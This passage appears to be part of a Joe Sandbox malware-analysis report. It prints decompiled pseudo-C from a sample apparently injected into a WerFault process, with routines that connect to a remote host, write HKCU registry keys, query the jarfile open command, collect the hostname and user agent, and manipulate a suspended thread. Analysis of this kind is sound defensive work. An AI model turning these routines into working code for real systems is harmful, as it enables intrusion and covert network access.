                        						if(_v196 != 6) {
                        							goto L28;
                        						}
                        						goto L27;
                        					}
                        					if(_v156 != 5) {
                        						if(_v156 != 6) {
                        							goto L23;
                        						}
                        						if(_v152 != 0) {
                        							if(_v152 != 1) {
                        								if(_v152 != _t33) {
                        									goto L23;
                        								}
                        								_push(0x10);
                        								goto L24;
                        							}
                        							_push(0x20);
                        							goto L24;
                        						}
                        						_push(0x40);
                        						goto L24;
                        					}
                        					if(_v152 == 1 || _v152 == _t33) {
                        						_t33 = 0x80;
                        						goto L25;
                        					} else {
                        						goto L23;
                        					}
                        				}
                        			}
                        0x0286545d
                        0x0286546d
                        0x02865479
                        0x02865483
                        0x02865490
                        0x02865498
                        0x0286549c
                        0x02865505
                        0x0286551b
                        0x00000000
                        0x00000000
                        0x02865524
                        0x00000000
                        0x00000000
                        0x0286552d
                        0x02865539
                        0x00000000
                        0x00000000
                        0x0286553b
                        0x00000000
                        0x0286553b
                        0x0286552f
                        0x00000000
                        0x0286552f
                        0x0286550d
                        0x00000000
                        0x00000000
                        0x02865511
                        0x00000000
                        0x028654a4
                        0x028654a8
                        0x02865542
                        0x02865542
                        0x02865544
                        0x02865544
                        0x02865545
                        0x0286554d
                        0x0286555e
                        0x0286555e
                        0x02865563
                        0x02865567
                        0x02865568
                        0x02865580
                        0x0286556a
                        0x0286556a
                        0x0286556b
                        0x02865578
                        0x0286556d
                        0x0286556e
                        0x02865570
                        0x02865570
                        0x0286556e
                        0x0286556b
                        0x0286558a
                        0x02865591
                        0x02865591
                        0x02865557
                        0x0286555c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0286555c
                        0x028654b5
                        0x028654d6
                        0x00000000
                        0x00000000
                        0x028654df
                        0x028654ec
                        0x028654f8
                        0x00000000
                        0x00000000
                        0x028654fa
                        0x00000000
                        0x028654fa
                        0x028654ee
                        0x00000000
                        0x028654ee
                        0x028654e1
                        0x00000000
                        0x028654e1
                        0x028654be
                        0x028654c8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x028654be

                        APIs
                        • GetNativeSystemInfo.KERNEL32(?,?,00000000,00000024,?,00000000,0000009C), ref: 02865483
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoNativeSystem
                        • String ID:
                        • API String ID: 1721193555-0
                        • Opcode ID: caba29d19238c9bde5db4454b783724f46c143458e5e3197da9c6a64fa728839
                        • Instruction ID: a3699ac9ad464ec5f9180db71d0d9370b610f8b0c52d76ba8bbd04c8abf7b48b
                        • Opcode Fuzzy Hash: caba29d19238c9bde5db4454b783724f46c143458e5e3197da9c6a64fa728839
                        • Instruction Fuzzy Hash: B431107CD55228DAEF749664CC0EBB872B6BB05309F8480E6D24DE54C1D77C46C5CB11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 47%
                        			E0287A99E(void* __ecx) {
                        				char _v8;
                        				void* _v12;
                        				void* _t13;
                        				char* _t20;
                        				short _t24;
                        				void* _t27;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t27 = __ecx;
                        				if( *((intOrPtr*)(__ecx + 0x64)) == 0xc0) {
                        					if( *((intOrPtr*)(__ecx + 0x124)) == 0) {
                        						goto L1;
                        					} else {
                        						_t24 =  *(__ecx + 0x78) & 0x0000ffff;
                        						_t20 = __ecx + 0x8a;
                        						_v8 = 1;
                        						_v12 = 0x1234;
                        						if(E02866E47(_t20) == 1) {
                        							L7:
                        							_t13 = 0;
                        						} else {
                        							if(_t24 == 0) {
                        								_t24 = 0x50;
                        							}
                        							 *0x289fbc4( *(_t27 + 0x124), 0x4d,  &_v8, 4);
                        							_t13 = InternetConnectA( *(_t27 + 0x124), _t20, _t24, 0, 0, 3, 0,  &_v12); // executed
                        							if(_t13 != 0) {
                        								 *(_t27 + 0x128) = _t13;
                        							} else {
                        								goto L7;
                        							}
                        						}
                        					}
                        				} else {
                        					L1:
                        					_t13 = 0;
                        				}
                        				return _t13;
                        			}
                        0x0287a9a1
                        0x0287a9a2
                        0x0287a9a4
                        0x0287a9af
                        0x0287a9bc
                        0x00000000
                        0x0287a9be
                        0x0287a9c0
                        0x0287a9c4
                        0x0287a9cb
                        0x0287a9d2
                        0x0287a9e0
                        0x0287aa1b
                        0x0287aa1b
                        0x0287a9e2
                        0x0287a9e5
                        0x0287a9e9
                        0x0287a9e9
                        0x0287a9f8
                        0x0287aa11
                        0x0287aa19
                        0x0287aa1f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0287aa19
                        0x0287aa26
                        0x0287a9b1
                        0x0287a9b1
                        0x0287a9b1
                        0x0287a9b1
                        0x0287aa29

                        APIs
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00001234,?,02870BFD,?,000000C0), ref: 0287AA11
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: ConnectInternet
                        • String ID:
                        • API String ID: 3050416762-0
                        • Opcode ID: 577bb747f3ec2f77ee46aa1d9637d97cf2e734b791ba223405db8bd4f5b11e99
                        • Instruction ID: 6906af972eec0f3ecee0dc5f1c7358e83d860c5d9dfb98d6c59d31b98d3664c6
                        • Opcode Fuzzy Hash: 577bb747f3ec2f77ee46aa1d9637d97cf2e734b791ba223405db8bd4f5b11e99
                        • Instruction Fuzzy Hash: 0C0192BA240605BEEB248B64CD45FFBB6FCEB44709F00046AF69AD2190E3709A64C720
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 29%
                        			E02862A42(void* __esi, char* _a4, intOrPtr _a8) {
                        				char _v8;
                        				void* _v12;
                        				int _v16;
                        				long _t18;
                        				void* _t21;
                        				void* _t30;
                        
                        				_v12 = 0;
                        				_v16 = 0;
                        				if(_a4 == 0 || E028619D6(_a4) == 0) {
                        					L4:
                        					return 0;
                        				} else {
                        					_v8 = 0;
                        					_t18 = RegCreateKeyExA(0x80000001, _a4, 0, 0, 0, 0x101, 0,  &_v12, 0); // executed
                        					if(_t18 != 0) {
                        						goto L4;
                        					}
                        					_t21 =  *0x289fafc(_v12, _a8, 0, 0,  &_v8,  &_v16, __esi);
                        					_t30 = _t21;
                        					 *0x289fb1c(_v12);
                        					_t13 = _t30 - 0xea; // -234
                        					asm("sbb eax, eax");
                        					return  !( ~_t13) & _v16;
                        				}
                        			}

                        0x02862a4b
                        0x02862a4e
                        0x02862a54
                        0x02862ab9
                        0x00000000
                        0x02862a62
                        0x02862a73
                        0x02862a7b
                        0x02862a83
                        0x00000000
                        0x00000000
                        0x02862a96
                        0x02862a9f
                        0x02862aa1
                        0x02862aa7
                        0x02862aaf
                        0x00000000
                        0x02862ab6

                        APIs
                        • RegCreateKeyExA.KERNEL32(80000001,?,00000000,00000000,00000000,00000101,00000000,?,00000000,00000002,02862EA6,?,00000000), ref: 02862A7B
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 90c4bd3d93082f415d6f7b824b824d4d694155a2ecaf06a3a4219bdd15e63435
                        • Instruction ID: 4e87dc7aeeca4071a64d2d3299f4671c4e5ede48042beeb9f374a6e69a549e22
                        • Opcode Fuzzy Hash: 90c4bd3d93082f415d6f7b824b824d4d694155a2ecaf06a3a4219bdd15e63435
                        • Instruction Fuzzy Hash: DF0129BEA4010DBFEB119FE5DC84DEEBBADEB14349F1084A5B905E2140D6719A64CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • RegCloseKey.KERNEL32(80000001), ref: 02862A28
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: e4319b482016b7e1b1a83f6baa3db7b67b1d2ee0c8d74174e6737a4d365f0a22
                        • Instruction ID: 7c5b3dc64d9786abda35d73bd804161bad268d63b48cd84aae4a1948efae2b56
                        • Opcode Fuzzy Hash: e4319b482016b7e1b1a83f6baa3db7b67b1d2ee0c8d74174e6737a4d365f0a22
                        • Instruction Fuzzy Hash: D8113979A01119FBDF21CFA0D8489EEBBBAAB04705F04C5A2FD05E2058D3B58A30DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E02865D65(intOrPtr __ebx, void* __ecx, void* _a4) {
                        				long _v8;
                        				intOrPtr _v548;
                        				char _v724;
                        				void* _t13;
                        				void* _t16;
                        				void* _t20;
                        				void* _t26;
                        
                        				_t24 = __ecx;
                        				if(__ebx != 0) {
                        					_v8 = _v8 & 0x00000000;
                        					E028614DB(__ecx,  &_v724, 0, 0x2cc);
                        					_t13 = CreateThread(0, 0,  *0x289f83c, _a4, 4,  &_v8); // executed
                        					_t26 = _t13;
                        					if(_t26 == 0) {
                        						L7:
                        						return _t26;
                        					}
                        					_v724 = 0x10007;
                        					_t16 = L02887534(_t26,  &_v724); // executed
                        					if(_t16 == 0) {
                        						L6:
                        						L02887454(_t26);
                        						 *0x289f824(_t26);
                        						_t26 = 0;
                        						goto L7;
                        					}
                        					_v548 = __ebx;
                        					_t20 = L028874C3(_t26,  &_v724); // executed
                        					if(_t20 == 0) {
                        						goto L6;
                        					}
                        					L02887364(_t24, _t26); // executed
                        					goto L7;
                        				}
                        				return 0;
                        			}

                        0x02865d65
                        0x02865d70
                        0x02865d79
                        0x02865d8c
                        0x02865da4
                        0x02865daa
                        0x02865dae
                        0x02865df9
                        0x00000000
                        0x02865dfb
                        0x02865db8
                        0x02865dc2
                        0x02865dc9
                        0x02865dea
                        0x02865deb
                        0x02865df1
                        0x02865df7
                        0x00000000
                        0x02865df7
                        0x02865dd3
                        0x02865dd9
                        0x02865de0
                        0x00000000
                        0x00000000
                        0x02865de3
                        0x00000000
                        0x02865de3
                        0x00000000

                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,0286D48A,00000004,00000000,?,00000000,000002CC,00000208), ref: 02865DA4
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread
                        • String ID:
                        • API String ID: 2422867632-0
                        • Opcode ID: 3a4cd5943cb5172780cd05a70b00ee6506174af791b39a10244dee559a6512da
                        • Instruction ID: 181b674a2d50c0189d6ddcd97c5bbc9bdc0b6d6ef364377de2591e7758b1e654
                        • Opcode Fuzzy Hash: 3a4cd5943cb5172780cd05a70b00ee6506174af791b39a10244dee559a6512da
                        • Instruction Fuzzy Hash: CD01527DD0122566D720BB649C4CFFEB6BCAF19744F5440A1EB08F11D1D778AA448AA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E02862AC0(void* __ecx, void* _a4, char* _a8, intOrPtr _a12, char _a16) {
                        				void* _v8;
                        				void* _t13;
                        				long _t17;
                        
                        				_push(__ecx);
                        				if(_a8 == 0) {
                        					L4:
                        					_t13 = 0;
                        				} else {
                        					_v8 = 0;
                        					if(E028619D6(_a8) == 0) {
                        						goto L4;
                        					} else {
                        						_t17 = RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x102, 0,  &_v8, 0); // executed
                        						if(_t17 != 0) {
                        							goto L4;
                        						} else {
                        							L0288776E(_v8, _a12, 0, 4,  &_a16, 4); // executed
                        							 *0x289fb1c(_v8);
                        							_t13 = 1;
                        						}
                        					}
                        				}
                        				return _t13;
                        			}

                        0x02862ac3
                        0x02862aca
                        0x02862b20
                        0x02862b20
                        0x02862acc
                        0x02862ad2
                        0x02862adf
                        0x00000000
                        0x02862ae1
                        0x02862af5
                        0x02862afd
                        0x00000000
                        0x02862aff
                        0x02862b0e
                        0x02862b16
                        0x02862b1c
                        0x02862b1c
                        0x02862afd
                        0x02862adf
                        0x02862b24

                        APIs
                        • RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,00000102,00000000,00000003,00000000,00000001,?,?,02863F81,80000001,?,2500), ref: 02862AF5
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 567dc4ad6bd8a3481cf5e6bb8911c04703792ef5ca1cc933b4d9a5bc21375091
                        • Instruction ID: d964a6d20f5c639031b9a173fcba0918aa6f6479b35f627a9845546b4d81c483
                        • Opcode Fuzzy Hash: 567dc4ad6bd8a3481cf5e6bb8911c04703792ef5ca1cc933b4d9a5bc21375091
                        • Instruction Fuzzy Hash: 4A012479602229FACF119E61DD0AEEF7BADEF15754F004451BE08E6194D3709A20DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 16%
                        			E0288552B() {
                        				char _v5;
                        				char _v6;
                        				char _v7;
                        				signed int _v8;
                        				char _v264;
                        				int _t16;
                        				signed int _t18;
                        				void* _t20;
                        				intOrPtr* _t23;
                        
                        				_v8 = _v8 & 0x00000000;
                        				_t16 = gethostname( &_v264, 0xff); // executed
                        				if(_t16 != 0xffffffff) {
                        					_t18 =  *0x289fd84( &_v264);
                        					if(_t18 != 0xffffffff) {
                        						L5:
                        						 *0x28a0664 = _t18;
                        						 *0x28a0668 = _t18;
                        						return _t18;
                        					} else {
                        						_t20 =  *0x289fd70( &_v264);
                        						if(_t20 == 0) {
                        							goto L1;
                        						} else {
                        							_t23 =  *((intOrPtr*)( *((intOrPtr*)(_t20 + 0xc))));
                        							_v8 =  *_t23;
                        							_v7 =  *((intOrPtr*)(_t23 + 1));
                        							_v6 =  *((intOrPtr*)(_t23 + 2));
                        							_v5 =  *((intOrPtr*)(_t23 + 3));
                        							_t18 = _v8;
                        							goto L5;
                        						}
                        					}
                        				} else {
                        					L1:
                        					return 0;
                        				}
                        			}

                        0x02885534
                        0x02885544
                        0x0288554d
                        0x0288555a
                        0x02885563
                        0x02885595
                        0x02885595
                        0x0288559a
                        0x028855a0
                        0x02885565
                        0x0288556c
                        0x02885574
                        0x00000000
                        0x02885576
                        0x02885579
                        0x0288557d
                        0x02885583
                        0x0288558c
                        0x0288558f
                        0x02885592
                        0x00000000
                        0x02885592
                        0x02885574
                        0x0288554f
                        0x0288554f
                        0x02885552
                        0x02885552

                        APIs
                        • gethostname.WS2_32(?,000000FF), ref: 02885544
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: gethostname
                        • String ID:
                        • API String ID: 144339138-0
                        • Opcode ID: f2b0761c5b76095758997e7ebfd11c8ec81c4c714daf70aac5407d3a1aed900f
                        • Instruction ID: 4637988af9120933a6fd41bcac4bcd4df14a92a7dc3afe95fc8039f74f6de213
                        • Opcode Fuzzy Hash: f2b0761c5b76095758997e7ebfd11c8ec81c4c714daf70aac5407d3a1aed900f
                        • Instruction Fuzzy Hash: 0C01DF7DC042889FCB01CB789588AD9BBF46F29310F1886D0D285D32D2D734DA08DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 16%
                        			E0288575C(intOrPtr _a4, intOrPtr _a8) {
                        				void* _t6;
                        
                        				if(_a4 == 0 || _a8 == 0) {
                        					_t6 = 0xfffffffe;
                        					return _t6;
                        				} else {
                        					 *0x289fd34(2, 1, 0); // executed
                        					if(0 == 0xffffffff) {
                        						L5:
                        						return 0;
                        					}
                        					if(E0288570A(_a4, 0, _a8) == 0) {
                        						return 0;
                        					}
                        					E02885655(_t10, 0);
                        					goto L5;
                        				}
                        			}

                        0x02885765
                        0x0288579f
                        0x00000000
                        0x0288576d
                        0x02885772
                        0x0288577d
                        0x02885795
                        0x00000000
                        0x02885795
                        0x0288578d
                        0x00000000
                        0x02885799
                        0x02885790
                        0x00000000
                        0x02885790

                        APIs
                        • socket.WS2_32(00000002,00000001,00000000,00000000,?,02870D92,00000000,00000050,?,LCT,00000000), ref: 02885772
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: socket
                        • String ID:
                        • API String ID: 98920635-0
                        • Opcode ID: 90340afc90048efb6279142c82d889c8d2a7b38e453251e84b22dd27c7f7cdcf
                        • Instruction ID: b52f009c4a8a6f8aa5a2135aaa5944382a151fe9c1e8b95bf296df58bc57dbef
                        • Opcode Fuzzy Hash: 90340afc90048efb6279142c82d889c8d2a7b38e453251e84b22dd27c7f7cdcf
                        • Instruction Fuzzy Hash: 9BF0E53D104224FADB3179788C449AA73998B04364F86C631BD2CDA0C0E67CC94087F1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 37%
                        			E02862B90(void* __ecx, void* _a4, char* _a8) {
                        				void* _v8;
                        				long _t8;
                        				int _t9;
                        				int _t12;
                        
                        				_t12 = 0;
                        				_v8 = 0;
                        				_t8 = RegOpenKeyExA(_a4, _a8, 0, 1,  &_v8); // executed
                        				if(_t8 == 0) {
                        					if(_v8 != 0) {
                        						_t12 = 1;
                        						 *0x289fb1c(_v8);
                        					}
                        					_t9 = _t12;
                        				} else {
                        					_t9 = 0;
                        				}
                        				return _t9;
                        			}

                        0x02862b9b
                        0x02862ba1
                        0x02862ba7
                        0x02862baf
                        0x02862bb8
                        0x02862bbd
                        0x02862bbf
                        0x02862bbf
                        0x02862bc5
                        0x02862bb1
                        0x02862bb1
                        0x02862bb1
                        0x02862bc9

                        APIs
                        • RegOpenKeyExA.KERNELBASE(?,028A0044,00000000,00000001,00000000,00000160,?,?,0286CF24,80000000,jarfile\shell\open\command,?,00000000,00000160,?,00000000), ref: 02862BA7
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Open
                        • String ID:
                        • API String ID: 71445658-0
                        • Opcode ID: 8b0f28a8ddefe6335aec4c7d71149927f82fe1dacb4c1d50c96f55474f7a60db
                        • Instruction ID: 3a090ba77715f6f6a3d22113e7154ae8f12e930cf1a1d54edb91921a69b52a6b
                        • Opcode Fuzzy Hash: 8b0f28a8ddefe6335aec4c7d71149927f82fe1dacb4c1d50c96f55474f7a60db
                        • Instruction Fuzzy Hash: BAE0ED79640209FFDF419EA0D889DEE776CEB15348B1484A6A90192150D6729E14AA20
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ObtainUserAgentString.URLMON(00000000,00000104,000000C0,?,?,0287A91F,?,?,00000000,00000104,000000C0), ref: 028641BC
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: AgentObtainStringUser
                        • String ID:
                        • API String ID: 2681117516-0
                        • Opcode ID: daece715754ac1e9288faa0e27fb4f3df0ff38ac7971ce9d77c61ee756211680
                        • Instruction ID: d56a1d5a384ffbf11a685c170c039648e8772f39dc7f369a2dc2ffd334512fcf
                        • Opcode Fuzzy Hash: daece715754ac1e9288faa0e27fb4f3df0ff38ac7971ce9d77c61ee756211680
                        • Instruction Fuzzy Hash: 7BE04F7D915209FB8F28CF94DC84ABE76B49B653857208A2DE105E6500D374DB40DB58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GetFileAttributesW.KERNEL32(00000000), ref: 0288DC35
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: 6133915dd93ea68f2d5015dc6c280e35f0571aa3ccb4e9352814f4af2aa2d476
                        • Instruction ID: 2980dcf7b1c7ceebce645b0e2a4037f420abdf51367faa120806361574d9f74a
                        • Opcode Fuzzy Hash: 6133915dd93ea68f2d5015dc6c280e35f0571aa3ccb4e9352814f4af2aa2d476
                        • Instruction Fuzzy Hash: 08E04F3D4801089BEE183B70A54C26837AA6B35325F644900E329D46D0C7B184A0EA20
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 37%
                        			E028617E4(void* _a4) {
                        				void* _t3;
                        				char _t4;
                        
                        				if(_a4 != 0) {
                        					_t3 =  *0x289f904();
                        					if(_t3 != 0) {
                        						_t4 = RtlFreeHeap(_t3, 0, _a4); // executed
                        						return _t4;
                        					}
                        				}
                        				return _t3;
                        			}

                        0x028617eb
                        0x028617ed
                        0x028617f5
                        0x028617fd
                        0x00000000
                        0x028617fd
                        0x028617f5
                        0x02861804

                        APIs
                        • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,0286175C,00000000,00000000,00000000,00000002,kernel32.dll,?,?,02866361), ref: 028617FD
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: 2b3ed7d9b1322a518460adba53bac5b2fce34e41810f48fa08df99ec835e71b2
                        • Instruction ID: 9e4a52c7e4ba8ed1dc9f6e044f487eda9f81c210dc61d1dc0f9f442ceb188853
                        • Opcode Fuzzy Hash: 2b3ed7d9b1322a518460adba53bac5b2fce34e41810f48fa08df99ec835e71b2
                        • Instruction Fuzzy Hash: CFD0C93954020DAEDB145B95E90CBB53A9C9B20B47F284421BA0DD4591C7709560C6A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 83%
                        			E0286DDFF(signed int __ebx, intOrPtr* __ecx, void* __edx) {
                        				char _v8;
                        				void* __edi;
                        				void* _t17;
                        				intOrPtr _t27;
                        				void* _t32;
                        				void* _t39;
                        				signed char _t50;
                        				intOrPtr _t52;
                        				void* _t53;
                        
                        				_t53 = __edx;
                        				_t51 = __ecx;
                        				_t50 = __ebx;
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t61 = __ebx;
                        				if(__ebx != 0) {
                        					__eflags = __ebx & 0x00000002;
                        					if(__eflags == 0) {
                        						L4:
                        						if(_t50 == 0 || (_t50 & 0x00000001) != 0) {
                        							E0286E9F0(_t51); // executed
                        						}
                        						if(_t50 == 0 || (_t50 & 0x00000004) != 0) {
                        							E0286E89A();
                        						}
                        						if(_t50 != 0) {
                        							L22:
                        							_t17 = 1;
                        							goto L23;
                        						} else {
                        							if(E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff) == 1 ||  *0x28a0654 != 0) {
                        								_t51 = 0x28a0650;
                        								 *0x28a0650 = 0;
                        								 *0x28a0648 = 0;
                        								 *0x28a0644 = 0; // executed
                        								E02863F33(0x28a0650); // executed
                        								E0287D504(0x80); // executed
                        								E0287D6B6(0x28a0650, 0); // executed
                        							}
                        							 *0x289fdd4 = 0x400;
                        							_t27 = E0286161B(0x42000);
                        							 *0x28a0040 = _t27;
                        							_t70 = _t27;
                        							if(_t27 == 0) {
                        								 *0x289fdd4 = 0; // executed
                        							}
                        							E02874FB6(_t51, _t70); // executed
                        							E0288CEE2(_t51, _t70); // executed
                        							_t32 = E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff);
                        							_t71 = _t32 - 1;
                        							if(_t32 == 1) {
                        								 *0x289f8b0(0x28a0628, 0xfa0);
                        								E0288B5C5();
                        								E02875A56(0xfa0, _t71);
                        								E028770C0(_t51, _t71);
                        							}
                        							L02887B81(_t53, _t71);
                        							E0287F8DF(0x28a0500);
                        							_push(0xfa0);
                        							_push(0x28a04e8);
                        							if( *0x289f8b0() != 0) {
                        								_v8 = 0;
                        								 *0x28a4108 = 0;
                        								 *0x28a4100 = 0;
                        								 *0x28a40fc = 0;
                        								 *0x28a410c = 0;
                        								 *0x28a4104 = 0; // executed
                        								E02884444(_t51,  &_v8); // executed
                        								_t52 =  *0x289f2e8;
                        								_t39 = E0286D774( *(_t52 + 4) & 0x0000ffff);
                        								__eflags = _t39 - 1;
                        								if(_t39 == 1) {
                        									 *((intOrPtr*)(_t52 + 0x16a)) = _v8;
                        									Sleep(0x1e); // executed
                        									E02884512(0xecd,  *0x289fdb4, 0xccccccb2); // executed
                        									E02884512(0xecb,  *0x28a4104, _v8); // executed
                        									E02884512(0xec9, 0xc0001,  *0x289fdb4); // executed
                        									E02875A06(_t52, __eflags);
                        								}
                        								goto L22;
                        							} else {
                        								_t17 = 0;
                        								L23:
                        								return _t17;
                        							}
                        						}
                        					}
                        					L3:
                        					E0286E9A2(_t61); // executed
                        					goto L4;
                        				}
                        				E0286E93A(_t61);
                        				goto L3;
                        			}

                        APIs
                          • Part of subcall function 02884444: Sleep.KERNEL32(000000C8,00000FA0,0288E905,00000000,00000000,00000016,00000000,00000000,00000050,00000000,?,?,0286DF35,0286E0E2), ref: 02884471
                        • Sleep.KERNEL32(0000001E,?,0286E0E2,?,0286E0E2), ref: 0286DF54
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: ac849cedba77418991424255e408e7d15a5f2fb1f910444dda1e6fe352ea78c0
